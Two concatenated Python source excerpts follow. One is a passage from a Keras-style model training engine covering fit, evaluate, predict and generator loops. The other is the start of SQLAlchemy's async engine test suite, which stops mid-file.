outs.append(0.)
for i, batch_out in enumerate(batch_outs):
outs[i] += batch_out * len(batch_ids)
else:
if batch_index == 0:
outs.append(0.)
outs[0] += batch_outs * len(batch_ids)
if verbose == 1:
progbar.update(batch_end)
for i, out in enumerate(outs):
outs[i] /= nb_sample
if len(outs) == 1:
return outs[0]
return outs
def _standardize_user_data(self, x, y,
sample_weight=None, class_weight=None,
check_batch_axis=True, batch_size=None):
if not hasattr(self, 'optimizer'):
raise RuntimeError('You must compile a model before '
'training/testing. '
'Use `model.compile(optimizer, loss)`.')
output_shapes = []
for output_shape, loss_fn in zip(self.internal_output_shapes, self.loss_functions):
if loss_fn.__name__ == 'sparse_categorical_crossentropy':
output_shapes.append(output_shape[:-1] + (1,))
elif getattr(objectives, loss_fn.__name__, None) is None:
output_shapes.append(None)
else:
output_shapes.append(output_shape)
x = standardize_input_data(x, self.input_names,
self.internal_input_shapes,
check_batch_axis=False,
exception_prefix='model input')
y = standardize_input_data(y, self.output_names,
output_shapes,
check_batch_axis=False,
exception_prefix='model target')
sample_weights = standardize_sample_weights(sample_weight,
self.output_names)
class_weights = standardize_class_weights(class_weight,
self.output_names)
sample_weights = [standardize_weights(ref, sw, cw, mode)
for (ref, sw, cw, mode)
in zip(y, sample_weights, class_weights, self.sample_weight_modes)]
check_array_lengths(x, y, sample_weights)
check_loss_and_target_compatibility(y, self.loss_functions, self.internal_output_shapes)
if self.stateful and batch_size:
if x[0].shape[0] % batch_size != 0:
raise ValueError('In a stateful network, '
'you should only pass inputs with '
'a number of samples that can be '
'divided by the batch size. Found: ' +
str(x[0].shape[0]) + ' samples')
return x, y, sample_weights
def fit(self, x, y, batch_size=32, nb_epoch=10, verbose=1, callbacks=None,
validation_split=0., validation_data=None, shuffle=True,
class_weight=None, sample_weight=None, initial_epoch=0):
"""Trains the model for a fixed number of epochs (iterations on a dataset).
# Arguments
x: Numpy array of training data,
or list of Numpy arrays if the model has multiple inputs.
If all inputs in the model are named,
you can also pass a dictionary
mapping input names to Numpy arrays.
y: Numpy array of target data,
or list of Numpy arrays if the model has multiple outputs.
If all outputs in the model are named,
you can also pass a dictionary
mapping output names to Numpy arrays.
batch_size: integer. Number of samples per gradient update.
nb_epoch: integer, the number of times to iterate
over the training data arrays.
verbose: 0, 1, or 2. Verbosity mode.
0 = silent, 1 = verbose, 2 = one log line per epoch.
callbacks: list of callbacks to be called during training.
See [callbacks](/callbacks).
validation_split: float between 0 and 1:
fraction of the training data to be used as validation data.
The model will set apart this fraction of the training data,
will not train on it, and will evaluate
the loss and any model metrics
on this data at the end of each epoch.
validation_data: data on which to evaluate
the loss and any model metrics
at the end of each epoch. The model will not
be trained on this data.
This could be a tuple (x_val, y_val)
or a tuple (x_val, y_val, val_sample_weights).
shuffle: boolean, whether to shuffle the training data
before each epoch.
class_weight: optional dictionary mapping
class indices (integers) to
a weight (float) to apply to the model's loss for the samples
from this class during training.
This can be useful to tell the model to "pay more attention" to
samples from an under-represented class.
sample_weight: optional array of the same length as x, containing
weights to apply to the model's loss for each sample.
In the case of temporal data, you can pass a 2D array
with shape (samples, sequence_length),
to apply a different weight to every timestep of every sample.
In this case you should make sure to specify
sample_weight_mode="temporal" in compile().
initial_epoch: epoch at which to start training
(useful for resuming a previous training run)
# Returns
A `History` instance. Its `history` attribute contains
all information collected during training.
"""
# validate user data
x, y, sample_weights = self._standardize_user_data(
x, y,
sample_weight=sample_weight,
class_weight=class_weight,
check_batch_axis=False,
batch_size=batch_size)
# prepare validation data
if validation_data:
do_validation = True
if len(validation_data) == 2:
val_x, val_y = validation_data
val_sample_weight = None
elif len(validation_data) == 3:
val_x, val_y, val_sample_weight = validation_data
else:
raise ValueError('When passing validation_data, '
'it must contain 2 (x_val, y_val) '
'or 3 (x_val, y_val, val_sample_weights) '
'items, however it contains %d items' %
len(validation_data))
val_x, val_y, val_sample_weights = self._standardize_user_data(
val_x, val_y,
sample_weight=val_sample_weight,
check_batch_axis=False,
batch_size=batch_size)
self._make_test_function()
val_f = self.test_function
if self.uses_learning_phase and not isinstance(K.learning_phase(), int):
val_ins = val_x + val_y + val_sample_weights + [0.]
else:
val_ins = val_x + val_y + val_sample_weights
elif validation_split and 0. < validation_split < 1.:
do_validation = True
split_at = int(len(x[0]) * (1. - validation_split))
x, val_x = (slice_X(x, 0, split_at), slice_X(x, split_at))
y, val_y = (slice_X(y, 0, split_at), slice_X(y, split_at))
sample_weights, val_sample_weights = (
slice_X(sample_weights, 0, split_at),
slice_X(sample_weights, split_at))
self._make_test_function()
val_f = self.test_function
if self.uses_learning_phase and not isinstance(K.learning_phase(), int):
val_ins = val_x + val_y + val_sample_weights + [0.]
else:
val_ins = val_x + val_y + val_sample_weights
else:
do_validation = False
val_f = None
val_ins = None
# prepare input arrays and training function
if self.uses_learning_phase and not isinstance(K.learning_phase(), int):
ins = x + y + sample_weights + [1.]
else:
ins = x + y + sample_weights
self._make_train_function()
f = self.train_function
# prepare display labels
out_labels = self.metrics_names
# rename duplicated metrics name
# (can happen with an output layer shared among multiple dataflows)
deduped_out_labels = []
for i, label in enumerate(out_labels):
new_label = label
if out_labels.count(label) > 1:
dup_idx = out_labels[:i].count(label)
new_label += '_' + str(dup_idx + 1)
deduped_out_labels.append(new_label)
out_labels = deduped_out_labels
if do_validation:
callback_metrics = copy.copy(out_labels) + ['val_' + n for n in out_labels]
else:
callback_metrics = copy.copy(out_labels)
# delegate logic to _fit_loop
return self._fit_loop(f, ins, out_labels=out_labels,
batch_size=batch_size, nb_epoch=nb_epoch,
verbose=verbose, callbacks=callbacks,
val_f=val_f, val_ins=val_ins, shuffle=shuffle,
callback_metrics=callback_metrics,
initial_epoch=initial_epoch)
def evaluate(self, x, y, batch_size=32, verbose=1, sample_weight=None):
"""Returns the loss value and metrics values for the model
in test mode. Computation is done in batches.
# Arguments
x: Numpy array of test data,
or list of Numpy arrays if the model has multiple inputs.
If all inputs in the model are named,
you can also pass a dictionary
mapping input names to Numpy arrays.
y: Numpy array of target data,
or list of Numpy arrays if the model has multiple outputs.
If all outputs in the model are named,
you can also pass a dictionary
mapping output names to Numpy arrays.
batch_size: integer. Number of samples per gradient update.
# Returns
Scalar test loss (if the model has a single output and no metrics)
or list of scalars (if the model has multiple outputs
and/or metrics). The attribute `model.metrics_names` will give you
the display labels for the scalar outputs.
"""
# validate user data
x, y, sample_weights = self._standardize_user_data(
x, y,
sample_weight=sample_weight,
check_batch_axis=False,
batch_size=batch_size)
# prepare inputs, delegate logic to _test_loop
if self.uses_learning_phase and not isinstance(K.learning_phase, int):
ins = x + y + sample_weights + [0.]
else:
ins = x + y + sample_weights
self._make_test_function()
f = self.test_function
return self._test_loop(f, ins,
batch_size=batch_size,
verbose=verbose)
def predict(self, x, batch_size=32, verbose=0):
"""Generates output predictions for the input samples,
processing the samples in a batched way.
# Arguments
x: the input data, as a Numpy array
(or list of Numpy arrays if the model has multiple outputs).
batch_size: integer.
verbose: verbosity mode, 0 or 1.
# Returns
A Numpy array of predictions.
"""
# validate user data
x = standardize_input_data(x, self.input_names,
self.internal_input_shapes,
check_batch_axis=False)
if self.stateful:
if x[0].shape[0] > batch_size and x[0].shape[0] % batch_size != 0:
raise ValueError('In a stateful network, '
'you should only pass inputs with '
'a number of samples that can be '
'divided by the batch size. Found: ' +
str(x[0].shape[0]) + ' samples. '
'Batch size: ' + str(batch_size) + '.')
# prepare inputs, delegate logic to _predict_loop
if self.uses_learning_phase and not isinstance(K.learning_phase, int):
ins = x + [0.]
else:
ins = x
self._make_predict_function()
f = self.predict_function
return self._predict_loop(f, ins,
batch_size=batch_size, verbose=verbose)
def train_on_batch(self, x, y,
sample_weight=None, class_weight=None):
"""Runs a single gradient update on a single batch of data.
# Arguments
x: Numpy array of training data,
or list of Numpy arrays if the model has multiple inputs.
If all inputs in the model are named,
you can also pass a dictionary
mapping input names to Numpy arrays.
y: Numpy array of target data,
or list of Numpy arrays if the model has multiple outputs.
If all outputs in the model are named,
you can also pass a dictionary
mapping output names to Numpy arrays.
sample_weight: optional array of the same length as x, containing
weights to apply to the model's loss for each sample.
In the case of temporal data, you can pass a 2D array
with shape (samples, sequence_length),
to apply a different weight to every timestep of every sample.
In this case you should make sure to specify
sample_weight_mode="temporal" in compile().
class_weight: optional dictionary mapping
lass indices (integers) to
a weight (float) to apply to the model's loss for the samples
from this class during training.
This can be useful to tell the model to "pay more attention" to
samples from an under-represented class.
# Returns
Scalar training loss
(if the model has a single output and no metrics)
or list of scalars (if the model has multiple outputs
and/or metrics). The attribute `model.metrics_names` will give you
the display labels for the scalar outputs.
"""
x, y, sample_weights = self._standardize_user_data(
x, y,
sample_weight=sample_weight,
class_weight=class_weight,
check_batch_axis=True)
if self.uses_learning_phase and not isinstance(K.learning_phase, int):
ins = x + y + sample_weights + [1.]
else:
ins = x + y + sample_weights
self._make_train_function()
outputs = self.train_function(ins, **self._function_execute_args)
if len(outputs) == 1:
return outputs[0]
return outputs
def test_on_batch(self, x, y, sample_weight=None):
"""Test the model on a single batch of samples.
# Arguments
x: Numpy array of test data,
or list of Numpy arrays if the model has multiple inputs.
If all inputs in the model are named,
you can also pass a dictionary
mapping input names to Numpy arrays.
y: Numpy array of target data,
or list of Numpy arrays if the model has multiple outputs.
If all outputs in the model are named,
you can also pass a dictionary
mapping output names to Numpy arrays.
sample_weight: optional array of the same length as x, containing
weights to apply to the model's loss for each sample.
In the case of temporal data, you can pass a 2D array
with shape (samples, sequence_length),
to apply a different weight to every timestep of every sample.
In this case you should make sure to specify
sample_weight_mode="temporal" in compile().
# Returns
Scalar test loss (if the model has a single output and no metrics)
or list of scalars (if the model has multiple outputs
and/or metrics). The attribute `model.metrics_names` will give you
the display labels for the scalar outputs.
"""
x, y, sample_weights = self._standardize_user_data(
x, y,
sample_weight=sample_weight,
check_batch_axis=True)
if self.uses_learning_phase and not isinstance(K.learning_phase, int):
ins = x + y + sample_weights + [0.]
else:
ins = x + y + sample_weights
self._make_test_function()
outputs = self.test_function(ins, **self._function_execute_args)
if len(outputs) == 1:
return outputs[0]
return outputs
def predict_on_batch(self, x):
"""Returns predictions for a single batch of samples.
"""
x = standardize_input_data(x, self.input_names,
self.internal_input_shapes)
if self.uses_learning_phase and not isinstance(K.learning_phase, int):
ins = x + [0.]
else:
ins = x
self._make_predict_function()
outputs = self.predict_function(ins, **self._function_execute_args)
if len(outputs) == 1:
return outputs[0]
return outputs
def fit_generator(self, generator, samples_per_epoch, nb_epoch,
verbose=1, callbacks=None,
validation_data=None, nb_val_samples=None,
class_weight=None,
max_q_size=10, nb_worker=1, pickle_safe=False,
initial_epoch=0):
"""Fits the model on data generated batch-by-batch by
a Python generator.
The generator is run in parallel to the model, for efficiency.
For instance, this allows you to do real-time data augmentation
on images on CPU in parallel to training your model on GPU.
# Arguments
generator: a generator.
The output of the generator must be either
- a tuple (inputs, targets)
- a tuple (inputs, targets, sample_weights).
All arrays should contain the same number of samples.
The generator is expected to loop over its data
indefinitely. An epoch finishes when `samples_per_epoch`
samples have been seen by the model.
samples_per_epoch: integer, number of samples to process before
going to the next epoch.
nb_epoch: integer, total number of iterations on the data.
verbose: verbosity mode, 0, 1, or 2.
callbacks: list of callbacks to be called during training.
validation_data: this can be either
- a generator for the validation data
- a tuple (inputs, targets)
- a tuple (inputs, targets, sample_weights).
nb_val_samples: only relevant if `validation_data` is a generator.
number of samples to use from validation generator
at the end of every epoch.
class_weight: dictionary mapping class indices to a weight
for the class.
max_q_size: maximum size for the generator queue
nb_worker: maximum number of processes to spin up
when using process based threading
pickle_safe: if True, use process based threading.
Note that because
this implementation relies on multiprocessing,
you should not pass
non picklable arguments to the generator
as they can't be passed
easily to children processes.
initial_epoch: epoch at which to start training
(useful for resuming a previous training run)
# Returns
A `History` object.
# Example
```python
def generate_arrays_from_file(path):
while 1:
f = open(path)
for line in f:
# create numpy arrays of input data
# and labels, from each line in the file
x1, x2, y = process_line(line)
yield ({'input_1': x1, 'input_2': x2}, {'output': y})
f.close()
model.fit_generator(generate_arrays_from_file('/my_file.txt'),
samples_per_epoch=10000, nb_epoch=10)
```
"""
wait_time = 0.01 # in seconds
epoch = initial_epoch
do_validation = bool(validation_data)
self._make_train_function()
if do_validation:
self._make_test_function()
# python 2 has 'next', 3 has '__next__'
# avoid any explicit version checks
val_gen = (hasattr(validation_data, 'next') or
hasattr(validation_data, '__next__'))
if val_gen and not nb_val_samples:
raise ValueError('When using a generator for validation data, '
'you must specify a value for "nb_val_samples".')
out_labels = self.metrics_names
callback_metrics = out_labels + ['val_' + n for n in out_labels]
# prepare callbacks
self.history = cbks.History()
callbacks = [cbks.BaseLogger()] + (callbacks or []) + [self.history]
if verbose:
callbacks += [cbks.ProgbarLogger()]
callbacks = cbks.CallbackList(callbacks)
# it's possible to callback a different model than self:
if hasattr(self, 'callback_model') and self.callback_model:
callback_model = self.callback_model
else:
callback_model = self
callbacks.set_model(callback_model)
callbacks.set_params({
'nb_epoch': nb_epoch,
'nb_sample': samples_per_epoch,
'verbose': verbose,
'do_validation': do_validation,
'metrics': callback_metrics,
})
callbacks.on_train_begin()
if do_validation:
if not val_gen:
if len(validation_data) == 2:
val_x, val_y = validation_data
val_sample_weight = None
elif len(validation_data) == 3:
val_x, val_y, val_sample_weight = validation_data
else:
raise Exception('validation_data should be a tuple '
'(val_x, val_y, val_sample_weight) '
'or (val_x, val_y). Found: ' + str(validation_data))
val_x, val_y, val_sample_weights = self._standardize_user_data(val_x, val_y, val_sample_weight)
self.validation_data = val_x + [val_y, val_sample_weights]
self.validation_gen = None
else:
ValidationGen = namedtuple('ValidationGen', ['generator', 'nb_samples'])
self.validation_data = None
self.validation_gen = ValidationGen(
generator=validation_data,
nb_samples=nb_val_samples
)
else:
self.validation_data = None
self.validation_gen = None
enqueuer = None
try:
enqueuer = GeneratorEnqueuer(generator, pickle_safe=pickle_safe)
enqueuer.start(max_q_size=max_q_size, nb_worker=nb_worker)
callback_model.stop_training = False
while epoch < nb_epoch:
callbacks.on_epoch_begin(epoch)
samples_seen = 0
batch_index = 0
while samples_seen < samples_per_epoch:
generator_output = None
while enqueuer.is_running():
if not enqueuer.queue.empty():
generator_output = enqueuer.queue.get()
break
else:
time.sleep(wait_time)
if not hasattr(generator_output, '__len__'):
raise ValueError('output of generator should be a tuple '
'(x, y, sample_weight) '
'or (x, y). Found: ' +
str(generator_output))
if len(generator_output) == 2:
x, y = generator_output
sample_weight = None
elif len(generator_output) == 3:
x, y, sample_weight = generator_output
else:
raise ValueError('output of generator should be a tuple '
'(x, y, sample_weight) '
'or (x, y). Found: ' +
str(generator_output))
# build batch logs
batch_logs = {}
if isinstance(x, list):
batch_size = x[0].shape[0]
elif isinstance(x, dict):
batch_size = list(x.values())[0].shape[0]
else:
batch_size = x.shape[0]
batch_logs['batch'] = batch_index
batch_logs['size'] = batch_size
callbacks.on_batch_begin(batch_index, batch_logs)
outs = self.train_on_batch(x, y,
sample_weight=sample_weight,
class_weight=class_weight)
if not isinstance(outs, list):
outs = [outs]
for l, o in zip(out_labels, outs):
batch_logs[l] = o
callbacks.on_batch_end(batch_index, batch_logs)
# construct epoch logs
epoch_logs = {}
batch_index += 1
samples_seen += batch_size
# epoch finished
if samples_seen > samples_per_epoch:
warnings.warn('Epoch comprised more than '
'`samples_per_epoch` samples, '
'which might affect learning results. '
'Set `samples_per_epoch` correctly '
'to avoid this warning.')
if samples_seen >= samples_per_epoch and do_validation:
callbacks.on_val_begin(epoch)
if val_gen:
val_outs = self.evaluate_generator(
validation_data,
nb_val_samples,
max_q_size=max_q_size,
nb_worker=nb_worker,
pickle_safe=pickle_safe)
else:
# no need for try/except because
# data has already been validated
val_outs = self.evaluate(
val_x, val_y,
batch_size=batch_size,
sample_weight=val_sample_weights,
verbose=0)
if not isinstance(val_outs, list):
val_outs = [val_outs]
# same labels assumed
for l, o in zip(out_labels, val_outs):
epoch_logs['val_' + l] = o
callbacks.on_val_end(epoch, epoch_logs)
callbacks.on_epoch_end(epoch, epoch_logs)
epoch += 1
if callback_model.stop_training:
break
finally:
if enqueuer is not None:
enqueuer.stop()
callbacks.on_train_end()
return self.history
def evaluate_generator(self, generator, val_samples,
max_q_size=10, nb_worker=1, pickle_safe=False):
"""Evaluates the model on a data generator. The generator should
return the same kind of data as accepted by `test_on_batch`.
Arguments:
generator:
generator yielding tuples (inputs, targets)
or (inputs, targets, sample_weights)
val_samples:
total number of samples to generate from `generator`
before returning.
max_q_size: maximum size for the generator queue
nb_worker: maximum number of processes to spin up
when using process based threading
pickle_safe: if True, use process based threading.
Note that because
this implementation relies on multiprocessing,
you should not pass
non picklable arguments to the generator
as they can't be passed
easily to children processes.
# Returns
Scalar test loss (if the model has a single output and no metrics)
or list of scalars (if the model has multiple outputs
and/or metrics). The attribute `model.metrics_names` will give you
the display labels for the scalar outputs.
"""
self._make_test_function()
processed_samples = 0
wait_time = 0.01
all_outs = []
weights = []
enqueuer = None
try:
enqueuer = GeneratorEnqueuer(generator, pickle_safe=pickle_safe)
enqueuer.start(nb_worker=nb_worker, max_q_size=max_q_size)
while processed_samples < val_samples:
generator_output = None
while enqueuer.is_running():
if not enqueuer.queue.empty():
generator_output = enqueuer.queue.get()
break
else:
time.sleep(wait_time)
if not hasattr(generator_output, '__len__'):
raise ValueError('output of generator should be a tuple '
'(x, y, sample_weight) '
'or (x, y). Found: ' + str(generator_output))
if len(generator_output) == 2:
x, y = generator_output
sample_weight = None
elif len(generator_output) == 3:
x, y, sample_weight = generator_output
else:
raise ValueError('output of generator should be a tuple '
'(x, y, sample_weight) '
'or (x, y). Found: ' + str(generator_output))
outs = self.test_on_batch(x, y, sample_weight=sample_weight)
if isinstance(x, list):
nb_samples = len(x[0])
elif isinstance(x, dict):
nb_samples = len(list(x.values())[0])
else:
nb_samples = len(x)
all_outs.append(outs)
processed_samples += nb_samples
weights.append(nb_samples)
finally:
if enqueuer is not None:
enqueuer.stop()
if not isinstance(outs, list):
return np.average(np.asarray(all_outs),
weights=weights)
else:
averages = []
for i in range(len(outs)):
averages.append(np.average([out[i] for out in all_outs],
weights=weights))
return averages
def predict_generator(self, generator, val_samples,
max_q_size=10, nb_worker=1, pickle_safe=False):
"""Generates predictions for the input samples from a data generator.
The generator should return the same kind of data as accepted by
`predict_on_batch`.
# Arguments
generator: generator yielding batches of input samples.
val_samples: total number of samples to generate from `generator`
before returning.
max_q_size: maximum size for the generator queue
nb_worker: maximum number of processes to spin up
when using process based threading
pickle_safe: if True, use process based threading.
Note that because
this implementation relies on multiprocessing,
you should not pass
non picklable arguments to the generator
as they can't be passed
easily to children processes.
# Returns
Numpy array(s) of predictions.
"""
self._make_predict_function()
processed_samples = 0
wait_time = 0.01
all_outs = []
enqueuer = None
try:
enqueuer = GeneratorEnqueuer(generator, pickle_safe=pickle_safe)
enqueuer.start(nb_worker=nb_worker, max_q_size=max_q_size)
while processed_samples < val_samples:
generator_output = None
while enqueuer.is_running():
if not enqueuer.queue.empty():
generator_output = enqueuer.queue.get()
break
else:
time.sleep(wait_time)
if isinstance(generator_output, tuple):
if len(generator_output) == 2:
x, y = generator_output
sample_weight = None
elif len(generator_output) == 3:
x, y, sample_weight = generator_output
else:
raise ValueError('output of generator should be a tuple '
'(x, y, sample_weight) '
'or (x, y). Found: ' +
str(generator_output))
else:
x = generator_output
outs = self.predict_on_batch(x)
if isinstance(x, list):
nb_samples = len(x[0])
elif isinstance(x, dict):
nb_samples = len(list(x.values())[0])
else:
nb_samples = len(x)
if not isinstance(outs, list):
outs = [outs]
if len(all_outs) == 0:
for out in outs:
shape = (val_samples,) + out.shape[1:]
all_outs.append(np.zeros(shape, dtype=K.floatx()))
for i, out in enumerate(outs):
all_outs[i][processed_samples:(processed_samples + nb_samples)] = out
processed_samples += nb_samples
finally:
if enqueuer is not None:
enqueuer.stop()
if len(all_outs) == 1:
return all_outs[0]
return all_outs
|
test_engine_py3k.py
|
import asyncio
from sqlalchemy import Column
from sqlalchemy import create_engine
from sqlalchemy import delete
from sqlalchemy import event
from sqlalchemy import exc
from sqlalchemy import func
from sqlalchemy import inspect
from sqlalchemy import Integer
from sqlalchemy import select
from sqlalchemy import String
from sqlalchemy import Table
from sqlalchemy import testing
from sqlalchemy import text
from sqlalchemy import union_all
from sqlalchemy.ext.asyncio import create_async_engine
from sqlalchemy.ext.asyncio import engine as _async_engine
from sqlalchemy.ext.asyncio import exc as asyncio_exc
from sqlalchemy.ext.asyncio.base import ReversibleProxy
from sqlalchemy.ext.asyncio.engine import AsyncConnection
from sqlalchemy.ext.asyncio.engine import AsyncEngine
from sqlalchemy.pool import AsyncAdaptedQueuePool
from sqlalchemy.testing import assertions
from sqlalchemy.testing import async_test
from sqlalchemy.testing import combinations
from sqlalchemy.testing import config
from sqlalchemy.testing import engines
from sqlalchemy.testing import eq_
from sqlalchemy.testing import expect_raises
from sqlalchemy.testing import expect_raises_message
from sqlalchemy.testing import fixtures
from sqlalchemy.testing import is_
from sqlalchemy.testing import is_false
from sqlalchemy.testing import is_none
from sqlalchemy.testing import is_not
from sqlalchemy.testing import is_true
from sqlalchemy.testing import mock
from sqlalchemy.testing import ne_
from sqlalchemy.util.concurrency import greenlet_spawn
class AsyncFixture:
@config.fixture(
params=[
(rollback, run_second_execute, begin_nested)
for rollback in (True, False)
for run_second_execute in (True, False)
for begin_nested in (True, False)
]
)
def async_trans_ctx_manager_fixture(self, request, metadata):
rollback, run_second_execute, begin_nested = request.param
from sqlalchemy import Table, Column, Integer, func, select
t = Table("test", metadata, Column("data", Integer))
eng = getattr(self, "bind", None) or config.db
t.create(eng)
async def run_test(subject, trans_on_subject, execute_on_subject):
async with subject.begin() as trans:
if begin_nested:
if not config.requirements.savepoints.enabled:
config.skip_test("savepoints not enabled")
if execute_on_subject:
nested_trans = subject.begin_nested()
else:
nested_trans = trans.begin_nested()
async with nested_trans:
if execute_on_subject:
await subject.execute(t.insert(), {"data": 10})
else:
await trans.execute(t.insert(), {"data": 10})
# for nested trans, we always commit/rollback on the
# "nested trans" object itself.
# only Session(future=False) will affect savepoint
# transaction for session.commit/rollback
if rollback:
await nested_trans.rollback()
else:
await nested_trans.commit()
if run_second_execute:
with assertions.expect_raises_message(
exc.InvalidRequestError,
"Can't operate on closed transaction "
"inside context manager. Please complete the "
"context manager "
"before emitting further commands.",
):
if execute_on_subject:
await subject.execute(
t.insert(), {"data": 12}
)
else:
await trans.execute(
t.insert(), {"data": 12}
)
# outside the nested trans block, but still inside the
# transaction block, we can run SQL, and it will be
# committed
if execute_on_subject:
await subject.execute(t.insert(), {"data": 14})
else:
await trans.execute(t.insert(), {"data": 14})
else:
if execute_on_subject:
await subject.execute(t.insert(), {"data": 10})
else:
await trans.execute(t.insert(), {"data": 10})
if trans_on_subject:
if rollback:
await subject.rollback()
else:
await subject.commit()
else:
if rollback:
await trans.rollback()
else:
await trans.commit()
if run_second_execute:
with assertions.expect_raises_message(
exc.InvalidRequestError,
"Can't operate on closed transaction inside "
"context "
"manager. Please complete the context manager "
"before emitting further commands.",
):
if execute_on_subject:
await subject.execute(t.insert(), {"data": 12})
else:
await trans.execute(t.insert(), {"data": 12})
expected_committed = 0
if begin_nested:
# begin_nested variant, we inserted a row after the nested
# block
expected_committed += 1
if not rollback:
# not rollback variant, our row inserted in the target
# block itself would be committed
expected_committed += 1
if execute_on_subject:
eq_(
await subject.scalar(select(func.count()).select_from(t)),
expected_committed,
)
else:
with subject.connect() as conn:
eq_(
await conn.scalar(select(func.count()).select_from(t)),
expected_committed,
)
return run_test
class EngineFixture(AsyncFixture, fixtures.TablesTest):
__requires__ = ("async_dialect",)
@testing.fixture
def async_engine(self):
return engines.testing_engine(asyncio=True, transfer_staticpool=True)
@classmethod
def define_tables(cls, metadata):
Table(
"users",
metadata,
Column("user_id", Integer, primary_key=True, autoincrement=False),
Column("user_name", String(20)),
)
@classmethod
def insert_data(cls, connection):
users = cls.tables.users
connection.execute(
users.insert(),
[{"user_id": i, "user_name": "name%d" % i} for i in range(1, 20)],
)
class AsyncEngineTest(EngineFixture):
__backend__ = True
@testing.fails("the failure is the test")
@async_test
async def test_we_are_definitely_running_async_tests(self, async_engine):
async with async_engine.connect() as conn:
eq_(await conn.scalar(text("select 1")), 2)
@async_test
async def test_interrupt_ctxmanager_connection(
self, async_engine, async_trans_ctx_manager_fixture
):
fn = async_trans_ctx_manager_fixture
async with async_engine.connect() as conn:
await fn(conn, trans_on_subject=False, execute_on_subject=True)
def test_proxied_attrs_engine(self, async_engine):
sync_engine = async_engine.sync_engine
is_(async_engine.url, sync_engine.url)
is_(async_engine.pool, sync_engine.pool)
is_(async_engine.dialect, sync_engine.dialect)
eq_(async_engine.name, sync_engine.name)
eq_(async_engine.driver, sync_engine.driver)
eq_(async_engine.echo, sync_engine.echo)
@async_test
async def test_engine_eq_ne(self, async_engine):
e2 = _async_engine.AsyncEngine(async_engine.sync_engine)
e3 = testing.engines.testing_engine(
asyncio=True, transfer_staticpool=True
)
eq_(async_engine, e2)
ne_(async_engine, e3)
is_false(async_engine == None)
@async_test
@testing.requires.python37
async def test_no_attach_to_event_loop(self, testing_engine):
"""test #6409"""
import asyncio
import threading
errs = []
def go():
loop = asyncio.new_event_loop()
asyncio.set_event_loop(loop)
async def main():
tasks = [task() for _ in range(2)]
await asyncio.gather(*tasks)
await engine.dispose()
async def task():
async with engine.begin() as connection:
result = await connection.execute(select(1))
result.all()
try:
engine = testing_engine(
asyncio=True, transfer_staticpool=False
)
asyncio.run(main())
except Exception as err:
errs.append(err)
t = threading.Thread(target=go)
t.start()
t.join()
if errs:
raise errs[0]
@async_test
async def test_connection_info(self, async_engine):
async with async_engine.connect() as conn:
conn.info["foo"] = "bar"
eq_(conn.sync_connection.info, {"foo": "bar"})
@async_test
async def test_connection_eq_ne(self, async_engine):
async with async_engine.connect() as conn:
c2 = _async_engine.AsyncConnection(
async_engine, conn.sync_connection
)
eq_(conn, c2)
async with async_engine.connect() as c3:
ne_(conn, c3)
is_false(conn == None)
@async_test
async def test_transaction_eq_ne(self, async_engine):
async with async_engine.connect() as conn:
t1 = await conn.begin()
t2 = _async_engine.AsyncTransaction._regenerate_proxy_for_target(
t1._proxied
)
eq_(t1, t2)
is_false(t1 == None)
def test_clear_compiled_cache(self, async_engine):
async_engine.sync_engine._compiled_cache["foo"] = "bar"
eq_(async_engine.sync_engine._compiled_cache["foo"], "bar")
async_engine.clear_compiled_cache()
assert "foo" not in async_engine.sync_engine._compiled_cache
def test_execution_options(self, async_engine):
a2 = async_engine.execution_options(foo="bar")
assert isinstance(a2, _async_engine.AsyncEngine)
eq_(a2.sync_engine._execution_options, {"foo": "bar"})
eq_(async_engine.sync_engine._execution_options, {})
"""
attr uri, pool, dialect, engine, name, driver, echo
methods clear_compiled_cache, update_execution_options,
execution_options, get_execution_options, dispose
"""
@async_test
async def test_proxied_attrs_connection(self, async_engine):
conn = await async_engine.connect()
sync_conn = conn.sync_connection
is_(conn.engine, async_engine)
is_(conn.closed, sync_conn.closed)
is_(conn.dialect, async_engine.sync_engine.dialect)
eq_(conn.default_isolation_level, sync_conn.default_isolation_level)
@async_test
async def test_transaction_accessor(self, async_engine):
async with async_engine.connect() as conn:
is_none(conn.get_transaction())
is_false(conn.in_transaction())
is_false(conn.in_nested_transaction())
trans = await conn.begin()
is_true(conn.in_transaction())
is_false(conn.in_nested_transaction())
is_(
trans.sync_transaction, conn.get_transaction().sync_transaction
)
nested = await conn.begin_nested()
is_true(conn.in_transaction())
is_true(conn.in_nested_transaction())
is_(
conn.get_nested_transaction().sync_transaction,
nested.sync_transaction,
)
eq_(conn.get_nested_transaction(), nested)
is_(
trans.sync_transaction, conn.get_transaction().sync_transaction
)
await nested.commit()
is_true(conn.in_transaction())
is_false(conn.in_nested_transaction())
await trans.rollback()
is_none(conn.get_transaction())
is_false(conn.in_transaction())
is_false(conn.in_nested_transaction())
@testing.requires.queue_pool
@async_test
async def test_invalidate(self, async_engine):
conn = await async_engine.connect()
is_(conn.invalidated, False)
connection_fairy = await conn.get_raw_connection()
is_(connection_fairy.is_valid, True)
dbapi_connection = connection_fairy.dbapi_connection
await conn.invalidate()
if testing.against("postgresql+asyncpg"):
assert dbapi_connection._connection.is_closed()
new_fairy = await conn.get_raw_connection()
is_not(new_fairy.dbapi_connection, dbapi_connection)
is_not(new_fairy, connection_fairy)
is_(new_fairy.is_valid, True)
is_(connection_fairy.is_valid, False)
@async_test
async def test_get_dbapi_connection_raise(self, async_engine):
conn = await async_engine.connect()
with testing.expect_raises_message(
exc.InvalidRequestError,
"AsyncConnection.connection accessor is not "
"implemented as the attribute",
):
conn.connection
@async_test
async def test_get_raw_connection(self, async_engine):
conn = await async_engine.connect()
pooled = await conn.get_raw_connection()
is_(pooled, conn.sync_connection.connection)
@async_test
async def test_isolation_level(self, async_engine):
conn = await async_engine.connect()
sync_isolation_level = await greenlet_spawn(
conn.sync_connection.get_isolation_level
)
isolation_level = await conn.get_isolation_level()
eq_(isolation_level, sync_isolation_level)
await conn.execution_options(isolation_level="SERIALIZABLE")
isolation_level = await conn.get_isolation_level()
eq_(isolation_level, "SERIALIZABLE")
await conn.close()
@testing.requires.queue_pool
@async_test
async def test_dispose(self, async_engine):
c1 = await async_engine.connect()
c2 = await async_engine.connect()
await c1.close()
await c2.close()
p1 = async_engine.pool
if isinstance(p1, AsyncAdaptedQueuePool):
eq_(async_engine.pool.checkedin(), 2)
await async_engine.dispose()
if isinstance(p1, AsyncAdaptedQueuePool):
eq_(async_engine.pool.checkedin(), 0)
is_not(p1, async_engine.pool)
@testing.requires.independent_connections
@async_test
async def test_init_once_concurrency(self, async_engine):
c1 = async_engine.connect()
c2 = async_engine.connect()
await asyncio.wait([c1, c2])
@async_test
